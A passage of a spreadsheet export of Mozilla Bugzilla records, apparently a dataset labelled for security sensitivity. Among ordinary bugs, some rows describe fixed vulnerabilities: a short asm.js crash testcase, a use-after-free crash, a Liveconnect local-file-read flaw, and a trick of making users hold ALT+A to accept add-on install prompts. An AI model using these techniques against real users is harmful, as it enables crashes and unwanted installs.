      <c r="B3992" t="inlineStr">
        <is>
          <t>2013-02-27 13:21:03 -0800</t>
        </is>
      </c>
      <c r="C3992" t="inlineStr">
        <is>
          <t>Redirect /metrofirefox/foo to /firefox/foo on www.mozilla.org</t>
        </is>
      </c>
      <c r="D3992" t="inlineStr">
        <is>
          <t>2014-07-24 11:06:19 -0700</t>
        </is>
      </c>
      <c r="E3992" t="n">
        <v>1</v>
      </c>
      <c r="F3992" t="n">
        <v>1</v>
      </c>
      <c r="G3992" t="n">
        <v>5</v>
      </c>
      <c r="H3992" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3992" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J3992" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3992" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3992" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3992" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N3992" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3992" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3992" t="inlineStr">
        <is>
          <t>u=user c=releng p=</t>
        </is>
      </c>
      <c r="Q3992" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3992" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3992" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3992" t="n">
        <v>1</v>
      </c>
      <c r="U3992" t="n">
        <v>0</v>
      </c>
      <c r="V3992" t="n">
        <v>16</v>
      </c>
      <c r="W3992" t="inlineStr">
        <is>
          <t>When users click the "Why was this page blocked" button on about:blocked, we send them to a URL specified by the pref "browser.safebrowsing.warning.infoURL", which defaults to "http://www.mozilla.org/%LOCALE%/%APP%/phishing-protection"
On my machine, this points to "http://www.mozilla.org/en-US/firefox/phishing-protection" for desktop Firefox and to "http://www.mozilla.org/en-US/metrofirefox/phishing-protection" for Metro/Immersive Firefox.
The latter URL is currently a 404, but we'll need it to be functional when we release Metro/Immersive Firefox.  I believe it is sufficient to have the same content as (or maybe have a redirect to) the desktop Firefox page.  CCing Asa to make calls about the content of this page.
We probably have a similar situation with other URLs.</t>
        </is>
      </c>
      <c r="X3992" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3993">
      <c r="A3993" t="n">
        <v>674826</v>
      </c>
      <c r="B3993" t="inlineStr">
        <is>
          <t>2011-07-28 00:01:25 -0700</t>
        </is>
      </c>
      <c r="C3993" t="inlineStr">
        <is>
          <t>Request to move Solaris contrib. builds for Thunderbird 6.0b1 to bouncer</t>
        </is>
      </c>
      <c r="D3993" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3993" t="n">
        <v>1</v>
      </c>
      <c r="F3993" t="n">
        <v>1</v>
      </c>
      <c r="G3993" t="n">
        <v>5</v>
      </c>
      <c r="H3993" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3993" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3993" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3993" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3993" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3993" t="inlineStr">
        <is>
          <t>Solaris</t>
        </is>
      </c>
      <c r="N3993" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3993" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3993" t="inlineStr"/>
      <c r="Q3993" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3993" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3993" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3993" t="n">
        <v>1</v>
      </c>
      <c r="U3993" t="n">
        <v>0</v>
      </c>
      <c r="V3993" t="n">
        <v>2</v>
      </c>
      <c r="W3993" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #669121 +++
6.0b1
solaris-sparc:
/thunderbird/releases/6.0b1/contrib/solaris_tarball/thunderbird-6.0b1.en-US.solaris-10-fcs-sparc.tar.bz2
solaris-i386:
/thunderbird/releases/6.0b1/contrib/solaris_tarball/thunderbird-6.0b1.en-US.solaris-10-fcs-i386.tar.bz2
opensolaris-sparc:
/thunderbird/releases/6.0b1/contrib/solaris_tarball/thunderbird-6.0b1.en-US.opensolaris-sparc.tar.bz2
opensolaris-i386:
/thunderbird/releases/6.0b1/contrib/solaris_tarball/thunderbird-6.0b1.en-US.opensolaris-i386.tar.bz2
The partial MAR for (5.0 to 6.0b1):
/thunderbird/releases/6.0b1/contrib/solaris_tarball/thunderbird-5.0-6.0b1.en-US.solaris-10-fcs-sparc.partial.mar
/thunderbird/releases/6.0b1/contrib/solaris_tarball/thunderbird-5.0-6.0b1.en-US.solaris-10-fcs-i386.partial.mar
/thunderbird/releases/6.0b1/contrib/solaris_tarball/thunderbird-5.0-6.0b1.en-US.opensolaris-sparc.partial.mar
/thunderbird/releases/6.0b1/contrib/solaris_tarball/thunderbird-5.0-6.0b1.en-US.opensolaris-i386.partial.mar
The complete MAR for 6.0b1:
/thunderbird/releases/6.0b1/contrib/solaris_tarball/thunderbird-6.0b1.en-US.solaris-10-fcs-sparc.complete.mar
/thunderbird/releases/6.0b1/contrib/solaris_tarball/thunderbird-6.0b1.en-US.solaris-10-fcs-i386.complete.mar
/thunderbird/releases/6.0b1/contrib/solaris_tarball/thunderbird-6.0b1.en-US.opensolaris-sparc.complete.mar
/thunderbird/releases/6.0b1/contrib/solaris_tarball/thunderbird-6.0b1.en-US.opensolaris-i386.complete.mar
Thanks!</t>
        </is>
      </c>
      <c r="X3993" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3994">
      <c r="A3994" t="n">
        <v>1232720</v>
      </c>
      <c r="B3994" t="inlineStr">
        <is>
          <t>2015-12-15 09:52:32 -0800</t>
        </is>
      </c>
      <c r="C3994" t="inlineStr">
        <is>
          <t>Change the `make xpi` command to produce a clean xpi that is suitable for uploading/publishing</t>
        </is>
      </c>
      <c r="D3994" t="inlineStr">
        <is>
          <t>2016-01-04 10:42:07 -0800</t>
        </is>
      </c>
      <c r="E3994" t="n">
        <v>1</v>
      </c>
      <c r="F3994" t="n">
        <v>1</v>
      </c>
      <c r="G3994" t="n">
        <v>6</v>
      </c>
      <c r="H3994" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3994" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J3994" t="inlineStr">
        <is>
          <t>Client</t>
        </is>
      </c>
      <c r="K3994" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3994" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3994" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3994" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3994" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3994" t="inlineStr">
        <is>
          <t>[github-addon-ship]</t>
        </is>
      </c>
      <c r="Q3994" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3994" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3994" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3994" t="n">
        <v>1</v>
      </c>
      <c r="U3994" t="n">
        <v>0</v>
      </c>
      <c r="V3994" t="n">
        <v>8</v>
      </c>
      <c r="W3994" t="inlineStr">
        <is>
          <t>Currently the `make xpi` command produces something that includes tests, .eslintrc files etc. We need to produce an xpi which is just the required parts.
I think the best thing here would be to use a dist to create a clean directory, which we then generate the xpi from.
This bug will ignore locale issues, we'll deal with those in a follow-up.</t>
        </is>
      </c>
      <c r="X3994" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3995">
      <c r="A3995" t="n">
        <v>1245743</v>
      </c>
      <c r="B3995" t="inlineStr">
        <is>
          <t>2016-02-03 19:46:49 -0800</t>
        </is>
      </c>
      <c r="C3995" t="inlineStr">
        <is>
          <t>crash in mozilla::ObservedDocShell::PopMarkers</t>
        </is>
      </c>
      <c r="D3995" t="inlineStr">
        <is>
          <t>2018-06-13 10:32:25 -0700</t>
        </is>
      </c>
      <c r="E3995" t="n">
        <v>1</v>
      </c>
      <c r="F3995" t="n">
        <v>1</v>
      </c>
      <c r="G3995" t="n">
        <v>3</v>
      </c>
      <c r="H3995" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3995" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J3995" t="inlineStr">
        <is>
          <t>Performance Tools (Profiler/Timeline)</t>
        </is>
      </c>
      <c r="K3995" t="inlineStr">
        <is>
          <t>45 Branch</t>
        </is>
      </c>
      <c r="L3995" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3995" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3995" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3995" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3995" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main47+] sec-high risk for people who use dev tools to profile</t>
        </is>
      </c>
      <c r="Q3995" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3995" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3995" t="inlineStr">
        <is>
          <t>Firefox 48</t>
        </is>
      </c>
      <c r="T3995" t="n">
        <v>1</v>
      </c>
      <c r="U3995" t="n">
        <v>0</v>
      </c>
      <c r="V3995" t="n">
        <v>37</v>
      </c>
      <c r="W3995" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-34e40358-b92d-4d0d-b3bc-7d8ea2160203.
=============================================================
This signature looks like a regression in v45.  Relatively low volume there,
but it seems to be higher volume in v46/47.  Crashes on all platforms.
Product 	Version Percentage 	Number Of Crashes
Firefox 	46.0a2 	84.36% 	151
Firefox 	47.0a1 	8.94% 	16
Firefox 	46.0a1 	3.35% 	6
Firefox 	45.0a2 	3.35% 	6
Filing as security sensitive since the address indicates UAF:
Crash Reason 	EXCEPTION_ACCESS_VIOLATION_READ
Crash Address 	0xffffffffe5e5e5e5
More Reports:
https://crash-stats.mozilla.com/report/list?product=Firefox&amp;signature=mozilla%3A%3AObservedDocShell%3A%3APopMarkers</t>
        </is>
      </c>
      <c r="X3995" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3996">
      <c r="A3996" t="n">
        <v>953104</v>
      </c>
      <c r="B3996" t="inlineStr">
        <is>
          <t>2013-12-25 05:04:27 -0800</t>
        </is>
      </c>
      <c r="C3996" t="inlineStr">
        <is>
          <t>OdinMonkey: Assertion failure: !elems_.empty(), at jit/AsmJS.cpp:1213 or Crash on Heap</t>
        </is>
      </c>
      <c r="D3996" t="inlineStr">
        <is>
          <t>2015-05-18 15:33:14 -0700</t>
        </is>
      </c>
      <c r="E3996" t="n">
        <v>1</v>
      </c>
      <c r="F3996" t="n">
        <v>1</v>
      </c>
      <c r="G3996" t="n">
        <v>3</v>
      </c>
      <c r="H3996" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3996" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3996" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K3996" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3996" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3996" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3996" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3996" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3996" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main29+]</t>
        </is>
      </c>
      <c r="Q3996" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3996" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3996" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T3996" t="n">
        <v>1</v>
      </c>
      <c r="U3996" t="n">
        <v>0</v>
      </c>
      <c r="V3996" t="n">
        <v>12</v>
      </c>
      <c r="W3996" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision cd3e9359fd64 (run with --fuzzing-safe --ion-eager --ion-compile-try-catch --ion-eager):
function m() {
    "use asm";
    function f() {
        var x = 0;
        var y = 0;
        y = y[(x + 1) &amp; 3]() | 0;
    }
    return f;
}
m()();</t>
        </is>
      </c>
      <c r="X3996" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3997">
      <c r="A3997" t="n">
        <v>872223</v>
      </c>
      <c r="B3997" t="inlineStr">
        <is>
          <t>2013-05-14 14:14:13 -0700</t>
        </is>
      </c>
      <c r="C3997" t="inlineStr">
        <is>
          <t>Create middleware service for data_dictionary table</t>
        </is>
      </c>
      <c r="D3997" t="inlineStr">
        <is>
          <t>2016-08-04 07:39:23 -0700</t>
        </is>
      </c>
      <c r="E3997" t="n">
        <v>1</v>
      </c>
      <c r="F3997" t="n">
        <v>1</v>
      </c>
      <c r="G3997" t="n">
        <v>6</v>
      </c>
      <c r="H3997" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3997" t="inlineStr">
        <is>
          <t>Socorro Graveyard</t>
        </is>
      </c>
      <c r="J3997" t="inlineStr">
        <is>
          <t>Middleware</t>
        </is>
      </c>
      <c r="K3997" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3997" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3997" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3997" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3997" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3997" t="inlineStr">
        <is>
          <t>[qa-]</t>
        </is>
      </c>
      <c r="Q3997" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3997" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3997" t="inlineStr">
        <is>
          <t>50</t>
        </is>
      </c>
      <c r="T3997" t="n">
        <v>1</v>
      </c>
      <c r="U3997" t="n">
        <v>0</v>
      </c>
      <c r="V3997" t="n">
        <v>7</v>
      </c>
      <c r="W3997" t="inlineStr">
        <is>
          <t>I'd like a middleware service that provides JSON to the front end, based on the data in the table data_dictionary, whose columns are: 
* raw_field: the breakpad variable in meta_data (HBase)
* product: currently NULL, but important and interesting for differentiating between things like Fennec and B2G
* transforms: a JSON blob that has keys and sometimes values that explain how a raw_field is transformed and also where it is transformed</t>
        </is>
      </c>
      <c r="X3997" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3998">
      <c r="A3998" t="n">
        <v>1440079</v>
      </c>
      <c r="B3998" t="inlineStr">
        <is>
          <t>2018-02-21 13:18:28 -0800</t>
        </is>
      </c>
      <c r="C3998" t="inlineStr">
        <is>
          <t>Tricking user into accepting PopupNotification prompts through holding down accessKey</t>
        </is>
      </c>
      <c r="D3998" t="inlineStr">
        <is>
          <t>2024-05-30 09:43:06 -0700</t>
        </is>
      </c>
      <c r="E3998" t="n">
        <v>1</v>
      </c>
      <c r="F3998" t="n">
        <v>1</v>
      </c>
      <c r="G3998" t="n">
        <v>6</v>
      </c>
      <c r="H3998" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3998" t="inlineStr">
        <is>
          <t>Toolkit Graveyard</t>
        </is>
      </c>
      <c r="J3998" t="inlineStr">
        <is>
          <t>Notifications and Alerts</t>
        </is>
      </c>
      <c r="K3998" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L3998" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3998" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3998" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3998" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3998" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main67+]</t>
        </is>
      </c>
      <c r="Q3998" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3998" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3998" t="inlineStr">
        <is>
          <t>mozilla67</t>
        </is>
      </c>
      <c r="T3998" t="n">
        <v>1</v>
      </c>
      <c r="U3998" t="n">
        <v>0</v>
      </c>
      <c r="V3998" t="n">
        <v>43</v>
      </c>
      <c r="W3998" t="inlineStr">
        <is>
          <t>Created attachment 8952850
installExt.xpi
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36
Steps to reproduce:
Install attached PoC extension and follow instructions.
Actual results:
I am mainly using the behavior where if a XPI file is visited then Firefox will automatically attempt to install and prompt user for confirmation.
I noticed that you press ALT+A you can agree to installing the webextension. And so I ask a user to hold down ALT+A and I then attempt to install addon only to trick user into agreeing to install.
Expected results:
Block from ALT+A being activated as soon as the install prompt appears.
A version of this can be done from normal web. See comment 1 and comment 2</t>
        </is>
      </c>
      <c r="X3998" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3999">
      <c r="A3999" t="n">
        <v>1267130</v>
      </c>
      <c r="B3999" t="inlineStr">
        <is>
          <t>2016-04-24 23:09:04 -0700</t>
        </is>
      </c>
      <c r="C3999" t="inlineStr">
        <is>
          <t>nsStandardURL::SetHost called net_ToLowerCase with a bogus pointer, #5</t>
        </is>
      </c>
      <c r="D3999" t="inlineStr">
        <is>
          <t>2016-09-22 17:22:24 -0700</t>
        </is>
      </c>
      <c r="E3999" t="n">
        <v>1</v>
      </c>
      <c r="F3999" t="n">
        <v>1</v>
      </c>
      <c r="G3999" t="n">
        <v>3</v>
      </c>
      <c r="H3999" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3999" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3999" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K3999" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3999" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3999" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3999" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3999" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3999" t="inlineStr">
        <is>
          <t>[necko-active][adv-main47+][adv-esr45.2+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3999" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3999" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3999" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T3999" t="n">
        <v>1</v>
      </c>
      <c r="U3999" t="n">
        <v>0</v>
      </c>
      <c r="V3999" t="n">
        <v>23</v>
      </c>
      <c r="W3999" t="inlineStr">
        <is>
          <t>Created attachment 8744782
testcase</t>
        </is>
      </c>
      <c r="X3999" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4000">
      <c r="A4000" t="n">
        <v>239122</v>
      </c>
      <c r="B4000" t="inlineStr">
        <is>
          <t>2004-03-29 15:10:38 -0800</t>
        </is>
      </c>
      <c r="C4000" t="inlineStr">
        <is>
          <t>Liveconnect can be used to read any file on user's filesystem</t>
        </is>
      </c>
      <c r="D4000" t="inlineStr">
        <is>
          <t>2013-12-27 14:30:34 -0800</t>
        </is>
      </c>
      <c r="E4000" t="n">
        <v>1</v>
      </c>
      <c r="F4000" t="n">
        <v>1</v>
      </c>
      <c r="G4000" t="n">
        <v>6</v>
      </c>
      <c r="H4000" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4000" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4000" t="inlineStr">
        <is>
          <t>Java: Live Connect</t>
        </is>
      </c>
      <c r="K4000" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4000" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4000" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4000" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4000" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4000" t="inlineStr">
        <is>
          <t>[sg:fix]doesnotaffect1.4</t>
        </is>
      </c>
      <c r="Q4000" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4000" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4000" t="inlineStr">
        <is>
          <t>mozilla1.7final</t>
        </is>
      </c>
      <c r="T4000" t="n">
        <v>1</v>
      </c>
      <c r="U4000" t="n">
        <v>0</v>
      </c>
      <c r="V4000" t="n">
        <v>25</v>
      </c>
      <c r="W4000" t="inlineStr">
        <is>
          <t>Liveconnect can be used to read any file on user's filesystem.
The patch for bug 146458 makes it possible to use Liveconnect to read any file
on the user's filesystem.
The change to nsCSecurityContext.cpp in the Implies method appears to be the
problem.
Attaching test case and patch.
The exploit is possible with Mozilla 1.7 beta.  I've only tested the Linux build.</t>
        </is>
      </c>
      <c r="X4000" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4001">
      <c r="A4001" t="n">
        <v>924348</v>
      </c>
      <c r="B4001" t="inlineStr">
        <is>
          <t>2013-10-08 03:45:13 -0700</t>
        </is>
      </c>
      <c r="C4001" t="inlineStr">
        <is>
          <t>Intermittent PROCESS-CRASH | /tests/dom/indexedDB/test/test_add_put.html | application crashed [@ sqlite3LeaveMutexAndCloseZombie] or [@ hashDestroy]</t>
        </is>
      </c>
      <c r="D4001" t="inlineStr">
        <is>
          <t>2024-08-20 12:28:43 -0700</t>
        </is>
      </c>
      <c r="E4001" t="n">
        <v>1</v>
      </c>
      <c r="F4001" t="n">
        <v>1</v>
      </c>
      <c r="G4001" t="n">
        <v>3</v>
      </c>
      <c r="H4001" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4001" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4001" t="inlineStr">
        <is>
          <t>SQLite and Embedded Database Bindings</t>
        </is>
      </c>
      <c r="K4001" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4001" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4001" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4001" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4001" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4001" t="inlineStr">
        <is>
          <t>[adv-main27+]</t>
        </is>
      </c>
      <c r="Q4001" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4001" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4001" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T4001" t="n">
        <v>1</v>
      </c>
      <c r="U4001" t="n">
        <v>0</v>
      </c>
      <c r="V4001" t="n">
        <v>238</v>
      </c>
      <c r="W4001" t="inlineStr">
        <is>
          <t>Rev4 MacOSX Lion 10.7 fx-team opt test mochitest-3 on 2013-10-08 03:34:28 PDT for push 295575989d53
slave: talos-r4-lion-057
https://tbpl.mozilla.org/php/getParsedLog.php?id=28820726&amp;tree=Fx-Team
WARNING -  PROCESS-CRASH | /tests/dom/indexedDB/test/test_add_put.html | application crashed [@ sqlite3LeaveMutexAndCloseZombie]
03:38:12     INFO -  Crash dump filename: /var/folders/hk/v8w8k7ss2g1fjccmkfk0t1l400000w/T/tmpolKVBu/minidumps/6553A854-BC1C-43EC-A742-F6D75017B8B9.dmp
03:38:12     INFO -  Operating system: Mac OS X
03:38:12     INFO -                    10.7.2 11C74
03:38:12     INFO -  CPU: amd64
03:38:12     INFO -       family 6 model 23 stepping 10
03:38:12     INFO -       2 CPUs
03:38:12     INFO -  Crash reason:  EXC_BAD_ACCESS / 0x0000000d
03:38:12     INFO -  Crash address: 0x0
03:38:12     INFO -  Thread 41 (crashed)
03:38:12     INFO -   0  libnss3.dylib!sqlite3LeaveMutexAndCloseZombie [sqlite3.c : 116556 + 0x0]
03:38:12     INFO -      rbx = 0x00000000ffffffff   r12 = 0x0000000000000000
03:38:12     INFO -      r13 = 0x0000000000000000   r14 = 0x000aa80000001500
03:38:12     INFO -      r15 = 0x000000011d23fc00   rip = 0x0000000100522d04
03:38:12     INFO -      rsp = 0x000000013ef6ab20   rbp = 0x000000013ef6ab50
03:38:12     INFO -      Found by: given as instruction pointer in context
03:38:12     INFO -   1  libnss3.dylib!sqlite3Close [sqlite3.c : 116460 + 0x7]
03:38:12     INFO -      rbx = 0x0000000000000000   r12 = 0x000000011f425630
03:38:12     INFO -      r13 = 0x000000011d23fc00   r14 = 0x0000000000000002
03:38:12     INFO -      r15 = 0x0000000000000048   rip = 0x000000010052e2c8
03:38:12     INFO -      rsp = 0x000000013ef6ab60   rbp = 0x000000013ef6ab90
03:38:12     INFO -      Found by: call frame info
03:38:12     INFO -   2  XUL!mozilla::storage::Connection::internalClose() [mozStorageConnection.cpp:295575989d53 : 834 + 0x8]
03:38:12     INFO -      rbx = 0x0000000000000000   r12 = 0x000000011f425630
03:38:12     INFO -      r13 = 0x0000000000000000   r14 = 0x000000011af5c270
03:38:12     INFO -      r15 = 0x000000011f425600   rip = 0x0000000101e0fc66
03:38:12     INFO -      rsp = 0x000000013ef6aba0   rbp = 0x000000013ef6abc0
03:38:12     INFO -      Found by: call frame info
03:38:12     INFO -   3  XUL!mozilla::storage::Connection::Close() [mozStorageConnection.cpp:295575989d53 : 1068 + 0x7]
03:38:12     INFO -      rbx = 0x0000000000000000   r12 = 0x000000011f425630
03:38:12     INFO -      r13 = 0x0000000000000000   r14 = 0x000000011af5c270
03:38:12     INFO -      r15 = 0x000000011f425600   rip = 0x0000000101e0e92b
03:38:12     INFO -      rsp = 0x000000013ef6abd0   rbp = 0x000000013ef6abf0
03:38:12     INFO -      Found by: call frame info
03:38:12     INFO -   4  XUL!mozilla::dom::indexedDB::CommitHelper::Run() [IDBTransaction.cpp:295575989d53 : 923 + 0x5]
03:38:12     INFO -      rbx = 0x000000011f425620   r12 = 0x000000011f425630
03:38:12     INFO -      r13 = 0x0000000000000000   r14 = 0x0000000000000003
03:38:12     INFO -      r15 = 0x000000011f425600   rip = 0x0000000101a4604b
03:38:12     INFO -      rsp = 0x000000013ef6ac00   rbp = 0x000000013ef6aca0
03:38:12     INFO -      Found by: call frame info</t>
        </is>
      </c>
      <c r="X4001" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4002">
      <c r="A4002" t="n">
        <v>1216748</v>
      </c>
      <c r="B4002" t="inlineStr">
        <is>
          <t>2015-10-20 14:00:07 -0700</t>
        </is>
      </c>
      <c r="C4002" t="inlineStr">
        <is>
          <t>stagefright: potential underflow in 'covr', unchecked allocation&amp;copy in Metadata::setData</t>
        </is>
      </c>
      <c r="D4002" t="inlineStr">
        <is>
          <t>2016-05-18 15:05:44 -0700</t>
        </is>
      </c>
      <c r="E4002" t="n">
        <v>1</v>
      </c>
      <c r="F4002" t="n">
        <v>1</v>
      </c>
      <c r="G4002" t="n">
        <v>3</v>
      </c>
      <c r="H4002" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4002" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4002" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K4002" t="inlineStr">
        <is>
          <t>44 Branch</t>
        </is>
      </c>
      <c r="L4002" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4002" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4002" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4002" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4002" t="inlineStr">
        <is>
          <t>[adv-main43+][adv-esr38.5+] AndroidID-20923261, published in August 2015; uplift 1206211 first on beta&amp;esr-38</t>
        </is>
      </c>
      <c r="Q4002" t="inlineStr">
